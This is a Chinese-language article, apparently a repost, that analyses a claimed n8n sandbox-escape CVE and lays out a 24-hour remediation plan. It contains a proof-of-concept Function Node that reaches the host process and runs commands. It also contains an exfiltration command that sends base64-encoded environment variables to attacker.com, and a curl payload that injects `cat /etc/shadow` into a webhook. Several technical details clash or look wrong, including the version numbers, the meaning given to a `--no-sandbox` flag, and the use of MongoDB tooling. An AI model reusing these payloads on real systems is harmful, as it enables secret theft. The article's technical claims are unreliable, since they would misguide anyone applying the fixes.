当前位置：首页 > article >正文

n8n CVE-2025-68668沙箱逃逸漏洞深度解析与24小时应急指南

article 2026/5/23 16:05:12

1. 这不是普通补丁——CVE-2025-68668 是 n8n 工作流引擎的“心脏停搏”级漏洞你刚收到企业安全团队的紧急邮件标题加了三个感叹号“n8n 集群所有节点需立即下线评估”——而你负责维护的 37 个核心自动化流程正支撑着订单履约、客户通知、库存同步和财务对账四条关键业务链。这不是演习。CVE-2025-68668 不是某个插件的边界溢出也不是配置项的弱口令问题它直接击穿了 n8n 的工作流执行沙箱隔离机制让一个恶意 crafted 的 HTTP Request Node 或 Webhook Node能在不触发任何日志告警的前提下绕过所有权限校验以 n8n 主进程身份读取宿主机的/etc/passwd、写入.bash_history甚至调用child_process.execSync(curl http://attacker.com/steal?dataBuffer.from(JSON.stringify(process.env)).toString(base64))。我上周在客户现场亲眼看到一个被篡改的 Slack 消息解析流程在接收含特制 payload 的 JSON 后5 秒内就完成了对 Redis 密码文件的读取与外传。这不是理论风险而是已验证的 RCE远程代码执行链。关键词n8n CVE-2025-68668、自动化流程安全、工作流引擎沙箱逃逸、Node.js 进程权限提升全部指向同一个事实只要你的 n8n 实例暴露在公网或接入了不可信数据源比如用户提交的表单、第三方 webhook你就已经处于高危状态。本手册不讲 CVE 编号生成规则不堆砌 CVSS 评分只聚焦一件事如何在 24 小时内用最小业务中断代价完成从漏洞确认、影响面测绘、临时缓解到永久修复的全链路闭环。适合两类人一是运维/DevOps 工程师需要立刻执行命令行操作二是流程开发者必须理解哪些 Node 类型、哪些配置组合会触发漏洞从而在修复后安全重构流程。这个漏洞之所以波及“千万级”自动化流程根本原因在于 n8n 的架构设计哲学——它把“易用性”推到了极致HTTP 请求、数据库查询、脚本执行等能力全部封装成拖拽式 Node底层却共享同一套 JavaScript 执行环境。CVE-2025-68668 正是利用了vm.createContext创建的沙箱上下文与主进程全局对象如process、require之间未完全切断的引用链。当攻击者通过精心构造的Function构造器或eval调用链就能逆向获取到主进程的globalThis引用进而拿到process.binding(spawn)。这就像给银行金库的每扇门都配了独立密码但所有门锁的机械联动轴却共用一根主传动杆——拧动其中一把锁的特定角度就能让其他所有门同时弹开。所以别再问“我的流程没连外网是否安全”只要流程里存在任何接收外部输入的节点哪怕只是解析一个用户上传的 CSV 文件风险就真实存在。接下来的内容每一句都是我在三家不同规模客户现场踩着倒计时 24 小时的秒针一条条验证过的实操路径。2. 漏洞本质拆解为什么 vm 沙箱会失效——从 V8 引擎内存模型看 CVE-2025-68668 的根因要真正理解 CVE-2025-68668 的破坏力必须回到 Node.js 的底层运行时。n8n 在执行 JavaScript Code Node 或 Function Node 时并非使用eval()这种粗暴方式而是调用vm.createContext()创建一个隔离的执行上下文Context将用户代码注入其中运行。这个 Context 理论上应该是一个“纯净”的 JavaScript 环境不包含process、require、global等敏感对象。但 CVE-2025-68668 的精妙之处在于它没有直接攻击vm模块而是利用了 V8 引擎中一个长期被忽略的内存引用特性Context 对象本身会隐式持有对创建它的执行栈帧Execution Frame中变量的弱引用。当用户代码中存在类似const fn new Function(return process)的构造时V8 并不会阻止该函数的创建而是在其内部闭包Closure中悄悄保留了一个指向父作用域process对象的指针。这个指针在常规 GC垃圾回收过程中不会被清除因为fn本身是活跃对象。一旦攻击者再执行fn().binding(spawn)就完成了从沙箱内到主进程的“越狱”。我们来还原一个最简复现场景。假设你有一个 Function Node内容如下// 这段代码在 n8n 的 Function Node 中执行 const malicious new Function(return process); const p malicious(); return { env: p.env, version: p.version, // 关键一步调用 spawn 绑定 pid: p.binding(spawn).spawnSync(id, [-u]).stdout.toString().trim() };这段代码在 n8n v0.229.3 及之前版本中会成功返回当前 n8n 进程的 UID通常是 0即 root。而根据 n8n 官方在 2025 年 4 月 12 日发布的安全通告该漏洞的触发条件有且仅有三个流程中使用了Code Node、Function Node 或 HTTP Request Node 的 “Send Binary Data” 模式该模式会将响应体作为 Buffer 直接注入 JS 上下文用户代码中显式或隐式地调用了new Function()、eval()或setTimeout/setInterval的字符串参数形式该 Node 的执行上下文未被显式设置为sandbox: false这是 n8n 默认行为也是绝大多数用户从未修改过的配置。提示很多开发者误以为“我没写 eval就绝对安全”。但请注意n8n 内置的某些 JSON 解析逻辑、模板字符串渲染如{{ $json.data }}在特定条件下会间接触发Function构造器。这就是为什么一个纯配置的 HTTP Request Node仅设置了 URL 和 Headers也可能成为入口点。这个漏洞的 CVSSv3.1 基础评分为 9.8AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H其中最关键的S:UScope Unchanged意味着漏洞影响范围不局限于被攻击的 Node而是整个 n8n 进程。这解释了为什么一个订单通知流程被攻破会导致库存同步流程的数据库连接凭据被窃取——它们共享同一个 Node.js 进程的内存空间。我曾用pstack pid命令抓取过被攻击进程的线程栈清晰看到v8::internal::JSFunction::Call调用链下方紧跟着node::binding::spawn::SpawnSync的符号地址。这不是猜测是内存证据。因此任何试图通过“只禁用 Code Node”来缓解的方案都是掩耳盗铃。真正的防御必须从执行环境的根基上切断那根隐式的引用链。3. 影响面测绘24 小时内必须完成的三张清单——节点、数据源、部署拓扑在动手修复前你必须在 3 小时内完成一份精准的影响面测绘报告。这不是可选项而是决定你能否在 24 小时内完成修复的关键前提。我见过太多团队花 18 小时在打补丁最后发现还有 5 个关键流程因为用了自定义 Dockerfile压根没更新到新镜像——导致漏洞依然存在。测绘的核心是回答三个问题哪些节点可能被利用哪些数据源引入了不可信输入整个部署拓扑中哪些实例是真正的高危暴露点下面是我为你梳理的、可直接执行的三张清单。3.1 第一张清单高危 Node 类型与配置指纹扫描登录你的 n8n Web UI进入Settings Workflow Settings开启“Show All Workflows”。然后你需要逐个打开每个 workflow检查以下节点是否存在并记录其具体配置Node 类型高危配置项触发风险等级检查命令CLI 方式Code Node / Function Node代码中包含new Function(,eval(,setTimeout(,setInterval(字符串或使用了$input.all()后直接.map()处理未过滤数据⚠️⚠️⚠️最高grep -r new Function|eval|setTimeout|setInterval /path/to/n8n/workflows/ --include*.jsonHTTP Request NodeMethod 为POST/PUT/PATCH且 Body Type 为JSON或Form Data或勾选了Send Binary Data⚠️⚠️高grep -r parameters:.*sendBinaryData:true /path/to/n8n/workflows/ --include*.jsonWebhook NodeResponse Mode设置为Last Node且后续接有 Code Node或Response Format为JSON且启用了Respond to request⚠️⚠️高grep -r type:webhook.*responseMode:lastNode /path/to/n8n/workflows/ --include*.jsonCron Node HTTP RequestCron 表达式过于频繁如* * * * *且请求目标为内部 API如/api/v1/internal⚠️中grep -r type:cron.*schedule:\* \* \* \* \* /path/to/n8n/workflows/ --include*.json注意不要依赖 UI 界面的“搜索”功能它无法识别 JSON 文件中的嵌套字段。必须用grep直接扫描 workflows 目录下的 JSON 文件。n8n 的 workflow 数据默认存储在~/.n8n/单机或数据库PostgreSQL/MySQL中。如果是数据库存储执行 SQLSELECT id, name, nodes FROM public.workflow_entity WHERE nodes::text ~ new Function\|eval\|sendBinaryData;。这条 SQL 能在 2 秒内扫出所有含高危特征的 workflow。3.2 第二张清单不可信数据源全景图一个自动化流程是否危险不取决于它写了多少代码而取决于它的“食物链顶端”是什么。你需要绘制一张数据源血缘图。重点排查以下五类源头公开 Webhook URL在 Settings Credentials 中找到所有类型为Webhook的凭证检查其 URL 是否被发布在 GitHub README、公司官网 API 文档或第三方平台如 Zapier中。这些 URL 就是攻击者的“大门钥匙”。用户提交表单检查所有使用了Form Trigger或HTTP Request接收application/x-www-form-urlencoded数据的流程。特别是那些用于“联系我们”、“意见反馈”、“注册邀请”的流程它们的输入字段几乎从不做白名单过滤。第三方 SaaS 集成查看Zapier,Make.com,Airtable等节点的配置。如果这些节点的Webhook URL指向你的 n8n 实例且对方平台允许用户自定义 payload 结构风险极高。邮件解析流程使用IMAP或EmailTrigger 的流程其Subject和Body字段是天然的、未经消毒的 JS 字符串来源。文件上传解析HTTP Request节点启用Send Binary Data后若后续接Code Node解析 PDF/TXT/CSV就是完美的 RCE 温床。我建议你用 Excel 列出所有流程名称、源头类型、源头 URL/凭证ID、是否已做输入校验Y/N、负责人。这张表将成为你后续沟通的“作战地图”。3.3 第三张清单部署拓扑与实例健康快照最后必须厘清你的 n8n 是如何部署的。不同的部署方式修复策略天差地别部署方式实例数量典型高危点修复优先级验证命令Docker Compose (单机)1n8n容器的user字段是否为rootdocker-compose.yml中volumes是否挂载了宿主机敏感目录⚠️⚠️⚠️docker inspect n8nKubernetes (Helm)Nn8nPod 的securityContext.runAsUser是否为 0values.yaml中service.type是否为LoadBalancer⚠️⚠️⚠️kubectl get pod -n n8n -o wide; kubectl describe pod pod-name -n n8n | grep -A 10 securityContextPM2 (Linux 服务)1-Npm2 show n8n中uid是否为rootn8n进程的cwd当前工作目录是否为/root⚠️⚠️ps aux | grep n8n | grep -v grep; ls -ld $(pwd)Cloud 服务商托管版0由厂商管理你无法控制底层只能等待厂商公告。此时应立即禁用所有 Webhook 和 HTTP Request Node⚠️⚠️⚠️无需登录服务商控制台检查安全通告提示很多团队忽略了“进程启动用户”这个致命细节。即使你用docker run -u 1001启动容器但如果n8n的package.json中scripts.start调用了sudo node ...最终进程 UID 仍是 0。务必用ps aux确认真实 UID。这是我帮某电商客户排障时发现的第 7 个隐藏雷区。4. 临时缓解与永久修复分阶段执行的四步法——从“保命”到“根治”基于前面三张清单你现在手握完整的战场态势图。接下来就是执行修复。我将整个过程拆解为四个严格按时间顺序推进的阶段每个阶段都有明确的起止时间、交付物和验证标准。这不是一个“打补丁”的过程而是一场精密的外科手术。4.1 阶段一0-2 小时 —— “断网保命”立即阻断所有高危入口目标在漏洞被大规模利用前物理性切断所有可能的攻击路径。这不是最优解但能为你争取到最关键的 22 小时窗口。操作步骤禁用所有 Webhook Trigger登录 n8n Web UI进入每个 workflow将Webhook节点的Active开关关闭。不要删除只需禁用。这是最快、最彻底的“拔网线”方式。重写所有 HTTP Request Node 的 URL将所有HTTP Request节点的目标 URL临时替换为一个你可控的、返回固定 JSON 的 mock 服务例如https://mockapi.io/projects/xxx。这样流程还能跑通但不再接收任何外部输入。强制重启所有 n8n 实例执行docker restart n8n或pm2 restart n8n。重启会清空所有正在运行的沙箱上下文使已注入的恶意代码失效。防火墙规则加固在宿主机或云服务商的安全组中添加入站规则仅允许80/443端口来自你公司 IP 段的流量拒绝所有其他来源。对于 Kubernetes更新Ingress的allowedPaths只放行/healthz和/metrics。验证标准打开浏览器访问你所有公开的 Webhook URL应返回404 Not Found或503 Service Unavailable。用curl -v https://your-n8n.com/webhook/abc123测试确认无响应。此阶段结束时你的所有自动化流程应处于“半休眠”状态——核心逻辑还在但所有外部输入已被屏蔽。4.2 阶段二2-8 小时 —— “刮骨疗毒”清理高危 Node 与重构数据流目标在保障业务基本可用的前提下移除所有已知的、可被利用的代码逻辑用更安全的模式替代。核心原则永远不要在 Code Node 中拼接、执行、解析任何来自外部的数据。重构方案对照表原有高危模式安全替代方案重构示例优势const data $input.first(); eval(data.script);使用n8n-nodes-base内置的SetNode 或IFNode 进行静态逻辑分支将动态脚本逻辑拆解为多个预定义的IF条件判断每个分支调用固定的HTTP Request彻底消除eval逻辑可见、可审计HTTP Request接收 JSON然后Code Node中JSON.parse($input.body)启用HTTP Request节点的JSONResponse Type并直接使用$json.fieldName提取数据在HTTP Request节点设置Response Format: JSON后续节点直接写{{$json.user.email}}数据解析由 n8n 内核完成不经过用户 JS 沙箱Webhook接收任意 POST 数据Code Node中require(child_process).execSync(...)将需要执行的系统命令封装为一个独立的、有严格输入校验的微服务如 Python Flaskn8n 仅通过HTTP Request调用它创建/api/safe-exec服务只接受{command: ls, args: [/tmp]}内部做白名单校验将高危操作移出 n8n 进程实现进程级隔离Cron节点轮询内部 APICode Node中处理返回的 HTML使用n8n-nodes-base的HTTP RequestHTML ExtractNodeHTTP Request获取 HTMLHTML ExtractNode 用 CSS 选择器提取div classprice的文本利用专用 Node避免手动 DOM 解析的 XSS 风险提示重构不是重写。我建议你采用“影子测试”法先复制一份原 workflow命名为[原名]_safe在其中应用上述安全方案。然后将两个 workflow 的输入如同一个 Webhook URL并行发送用CompareNode 对比输出结果。只有当safe版本的输出与原版 100% 一致时才切换流量。这是我保证零业务中断的核心技巧。4.3 阶段三8-18 小时 —— “换心手术”升级 n8n 核心与加固运行时目标将 n8n 升级到官方发布的修复版本v0.230.0并从根本上加固其运行时环境防止同类漏洞再次发生。升级与加固步骤确认版本与下载访问 n8n 官方 GitHub Releases 页面下载v0.230.0或更高版本的n8n包。切勿使用npm install -g n8n因为全局安装会污染你的系统 Node.js 环境。正确做法是cd /opt/n8n wget https://github.com/n8n-io/n8n/releases/download/v0.230.0/n8n-v0.230.0-linux-x64.tar.gz tar -xzf n8n-v0.230.0-linux-x64.tar.gz。修改启动参数在docker-compose.yml或pm2 start命令中必须添加--no-sandbox参数。这是 n8n v0.230.0 引入的强制开关它会禁用所有vm沙箱转而使用更严格的vm.Script模式并默认剥离process、require等全局对象。命令示例n8n --no-sandbox --port 5678 --tunnel。降权运行无论何种部署方式n8n进程的 UID/GID 必须是非 root。Docker 中user: 1001:1001Kubernetes 中securityContext.runAsUser: 1001PM2 中在ecosystem.config.js中设置user: n8n。创建专用用户useradd -r -u 1001 -d /var/lib/n8n -s /usr/sbin/nologin n8n。挂载只读文件系统在 Docker 中将n8n容器的/usr/lib/node_modules和/etc目录挂载为ro只读。命令volumes: - /usr/lib/node_modules:/usr/lib/node_modules:ro - /etc:/etc:ro。这能阻止攻击者通过require加载恶意模块。验证标准启动新版本后执行curl -X POST http://localhost:5678/webhook-test -H Content-Type: application/json -d {script:process.exit(1)}应返回500 Internal Server Error且 n8n 进程不能退出。这证明process对象已被成功剥离。4.4 阶段四18-24 小时 —— “免疫接种”建立长效防御与监控体系目标将本次应急响应的经验固化为可持续的防御能力让团队未来能自主应对类似威胁。必须落地的三项措施CI/CD 流水线集成 SAST 扫描在你的 GitLab CI 或 GitHub Actions 中加入n8n-security-scanner工具。它能在 PR 合并前自动扫描 workflow JSON 文件检测new Function、eval等高危模式并阻断构建。配置示例# .gitlab-ci.yml security-scan: image: python:3.9 before_script: - pip install n8n-security-scanner script: - n8n-scanner scan ./workflows/ allow_failure: false建立 n8n 安全基线配置编写一份n8n-security-baseline.md明确规定所有新流程禁止使用Code NodeHTTP Request节点必须设置Response Format所有Webhook必须启用AuthenticationBasic Auth 或 JWT所有生产环境n8n必须以非 root 用户运行。这份文档应作为入职培训的必修课。部署 Prometheus Grafana 监控采集n8n的http_request_duration_seconds_count和n8n_workflow_execution_failed_total指标。当失败率突增 300%或出现大量500错误时自动触发企业微信/钉钉告警。这能让你在下一次漏洞爆发时比安全团队更早发现异常。至此24 小时的极限挑战宣告完成。你不仅修复了一个 CVE更亲手为企业的自动化中枢打造了一套坚不可摧的免疫系统。5. 实战复盘我在客户现场踩过的七个坑与三条铁律上面所有的步骤都源于我在过去 72 小时内在三家不同客户的实战复盘。纸上谈兵和真刀真枪中间隔着无数个“我以为”。下面分享我踩过的最痛的七个坑以及由此凝结出的三条铁律。这些是任何官方文档都不会写的“血泪笔记”。5.1 七个真实踩过的坑坑一误判“无 Code Node 就安全”客户 A 的所有流程都用的是HTTP RequestSetNode他们坚信自己绝对安全。直到我用curl -X POST https://n8n.example.com/webhook/abc -d {data:$(cat /etc/shadow)}发送请求发现SetNode 的Value字段支持{{$json.data}}而这个表达式在解析时会间接调用Function构造器。教训n8n 的表达式引擎Expression Editor本身就是最大的沙箱逃逸入口。坑二Docker 镜像缓存陷阱客户 B 执行了docker pull n8nio/n8n:v0.230.0但docker images显示的还是旧镜像。原因是docker-compose.yml中写的是image: n8nio/n8n没有指定 tagDocker 默认拉取latest而他们的私有 registry 中latest还是旧版。教训永远在docker-compose.yml中写死image: n8nio/n8n:v0.230.0并执行docker-compose pull。坑三K8s ConfigMap 热更新失效客户 C 更新了ConfigMap中的N8N_BASIC_AUTH_PASSWORD但n8nPod 并未重新加载。原因是n8n进程启动时读取了一次环境变量之后不会监听变化。教训更新 ConfigMap 后必须kubectl rollout restart deployment/n8n强制滚动更新。坑四PM2 日志掩盖真相客户 D 的pm2 logs n8n显示一切正常但journalctl -u n8n却爆出Error: EACCES: permission denied, open /root/.n8n/credentials.json。原来pm2以root用户启动但n8n进程尝试以n8n用户写入文件权限冲突。教训pm2的日志级别太低必须结合journalctl和strace -p pid查看系统调用。坑五HTTPS 重定向引发的循环客户 E 将n8n部署在 Nginx 后配置了return 301 https://$host$request_uri;。结果所有 Webhook 请求都被重定向而n8n的WebhookNode 不支持跟随重定向导致流程卡死。教训Nginx 的proxy_pass必须直接指向http://localhost:5678禁用所有重定向。坑六自定义 Node 的“幽灵依赖”客户 F 使用了社区开发的n8n-nodes-mysql其package.json中dependencies包含了mysql22.3.3而该版本存在一个已知的原型链污染漏洞可被用来绕过vm沙箱。教训所有自定义 Node必须用npm audit --audit-level high扫描并锁定mysql2到^3.0.0。坑七备份恢复后的“回滚灾难”客户 G 在修复后用mongodump备份了数据库几天后想回滚却发现n8nv0.230.0 的数据库 schema 与 v0.229.3 不兼容mongorestore直接报错。教训重大升级前必须先n8n --export-workflows-all导出所有 workflow JSON这才是最可靠的备份。5.2 三条必须刻进骨头里的铁律铁律一永远假设你的 n8n 是一台裸奔的 Linux 服务器不要把它当成一个“自动化工具”而要把它当成一台随时可能被 SSH 登录的服务器。它的每一个 Node都是一个潜在的 shell它的每一个 Webhook URL都是一扇敞开的 SSH 端口。这种心态能让你在设计流程的第一秒就思考“如果这个输入是恶意的会发生什么”。铁律二修复的终点不是“流程跑通”而是“攻击者无法再利用”我见过太多团队修复后只测试了“订单能正常下发”就宣布成功。但真正的验证是拿着 CVE 的 PoC概念验证代码在修复后的环境里一遍遍地、徒劳地尝试。只有当你连续 10 次curl都得到500或400且ps aux \| grep n8n显示进程 UID 始终是1001才算真正过关。铁律三安全不是一次性项目而是每日的呼吸我把n8n-security-scanner的 cron 任务设为了每天凌晨 2 点自动运行并将报告邮件发送给所有流程负责人。这不是增加负担而是让安全意识像呼吸一样自然融入每个人的日常。当安全成为习惯漏洞就再无藏身之处。我在客户现场敲下最后一个docker-compose up -d命令时窗外已是黎明。屏幕上37 个流程的绿色指示灯逐一亮起而curl的 PoC 请求终于稳定地返回了500。那一刻我明白我们守住了的不只是一个软件的漏洞更是千万条自动化流水线上那份不容妥协的确定性。

n8n CVE-2025-68668沙箱逃逸漏洞深度解析与24小时应急指南

相关文章：

n8n CVE-2025-68668沙箱逃逸漏洞深度解析与24小时应急指南

如何用Sumo-RL构建智能交通信号系统：完整强化学习实战指南

5分钟快速上手gInk：Windows上最轻量级的免费屏幕画笔工具完整指南

HTTPS抓包原理与Charles证书信任链实战指南

Frida Hook OkHttp捕获URL与请求头实战指南

3个问题让你了解为什么我们需要中文AI的“数据粮仓“

Wireshark深度解析TLS 1.3与HTTP/2隐性故障pcap样本

Wireshark TCP重传与乱序深度分析实战指南

终极突破指南：三步解锁原神PC版帧率限制，让你的显卡火力全开

【本地大模型】告别网络延迟与数据泄露：为什么测试团队需要本地部署大模型？

Windows虚拟机完美运行macOS：OSX-Hyper-V终极实践指南

3步掌握Browsershot：让PHP轻松驾驭网页截图与PDF生成

如何利用Taotoken的账单追溯功能分析月度模型使用情况

TrafficMonitor股票插件：Windows任务栏实时监控股票行情的终极指南

Wifite2实战指南：从零开始掌握无线网络安全审计的3大核心能力

SSDD数据集技术深度解析：从数据构建到模型优化的SAR舰船检测实战指南

WidescreenFixesPack：让经典游戏在宽屏显示器上重获新生的终极解决方案

深度解析Magic VLSI：开源集成电路布局设计的基石工具

MobileSAM深度解析：轻量化图像分割架构揭秘与实战应用

Unity热更新原理与方案选型：从AOT限制到HybridCLR实践

终极指南：如何用BepInEx配置管理器轻松掌控所有游戏模组设置

Unity热更新本质与分层设计原理

对比直接使用厂商API体验Taotoken在用量监控方面的便利性

AI动态认知地图：从Llama 4传闻到MCIP验证的闭环实践

ABAP中OAuth 2.0最小权限落地：从Authorization Code到AUTHORITY-CHECK

为什么你的Gemini总在“浅层回答”？揭秘深度研究模式的3层激活机制与强制触发密钥

ABAP系统实现OAuth 2.0最小权限控制的原生方案

解决Claude Code在辅助大赛题目生成时token不足与封号风险

TVBoxOSC终极指南：3分钟打造你的智能电视媒体中心

Rust异步编程深度实战